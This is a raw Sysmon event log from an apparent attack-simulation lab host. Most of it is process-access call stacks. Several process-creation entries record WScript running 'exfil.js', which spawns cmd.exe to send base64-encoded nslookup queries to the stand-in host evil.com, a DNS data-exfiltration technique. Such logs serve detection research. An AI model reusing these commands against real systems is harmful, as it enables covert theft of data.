14:16:42.286{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-AA41-000000005F02}7804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.286{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-AA41-000000005F02}7804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.286{2E1864BB-17CA-629A-AA41-000000005F02}78046404C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-A941-000000005F02}7904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.270{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-AA41-000000005F02}7804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.254{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-A941-000000005F02}7904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.254{2E1864BB-17A1-629A-783D-000000005F02}5552924C:\Windows\System32\WScript.exe{2E1864BB-17CA-629A-A941-000000005F02}7904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.263{2E1864BB-17CA-629A-A941-000000005F02}7904C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlelo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.254{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloasztz.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.184{2E1864BB-17CA-629A-A741-000000005F02}57044204C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-A841-000000005F02}5432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.184{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.184{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-A841-000000005F02}5432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.184{2E1864BB-17CA-629A-A641-000000005F02}46367360C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-A841-000000005F02}5432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.192{2E1864BB-17CA-629A-A841-000000005F02}5432C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CA-629A-A641-000000005F02}4636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloasztz.tmp 2>&1 10341000x8000000000000000203424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.153{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-A741-000000005F02}5704C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.153{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-A741-000000005F02}5704C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.153{2E1864BB-17CA-629A-A741-000000005F02}57044204C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-A641-000000005F02}4636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.130{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-A741-000000005F02}5704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-A641-000000005F02}4636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-17A1-629A-783D-000000005F02}55527548C:\Windows\System32\WScript.exe{2E1864BB-17CA-629A-A641-000000005F02}4636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.123{2E1864BB-17CA-629A-A641-000000005F02}4636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloasztz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrfpe.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000203412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.685{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53009- 354300x8000000000000000203411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 